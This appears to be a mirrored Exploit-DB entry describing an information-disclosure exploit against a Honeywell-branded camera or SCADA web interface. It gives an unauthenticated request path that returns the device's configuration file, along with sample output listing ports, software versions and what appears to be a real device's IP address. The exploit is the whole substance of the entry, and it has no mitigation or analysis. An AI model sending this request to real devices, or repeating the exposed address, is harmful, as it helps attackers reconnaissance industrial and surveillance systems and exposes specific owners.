Honeywell Scada System – Information Disclosure

• Exploit Database
• 17 阅读

• 作者： t4rkd3vilz
  日期： 2018-05-23
• 类别：

  • webapps
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/44734/

• # Exploit Title: Honeywell Scada System - Information Disclosure
  # Date: 2018-05-23
  # Exploit Author: t4rkd3vilz
  # Vendor Homepage: https://www.honeywell.com
  # Version: WebVersion : 3.2.1.294365 - DeviceType : IPC-HFW2320R-ZS
  # Tested on: Linux
  
  # To be written after the destination IP address /web_caps/webCapsConfig
  # the downloaded file opens with the file name. The file contains
  # critical information about the destination address
  
  https://TargetIp/web_caps/webCapsConfig
  
  # Result:
  
  "Anonymous" : false,
   "DeviceSubClass" : "Unknown",
   "HttpPort" : {
  "InnerPort" : 80
   },
   "HttpsPort" : {
  "InnerPort" : 443
   },
   "NAS_Protocol_Mask" : 100,
   "PluginVersion" : "3.3.37.274972",
   "TCPPort" : 37777,
   "WebVersion" : "3.2.1.294365",
   "deviceType" : "IPC-HFW2320R-ZS",
   "eth0" : {
  "IPAddress" : "36.67.33.226",
  "IPv6Address" : "2001:250:3000:1::1:2"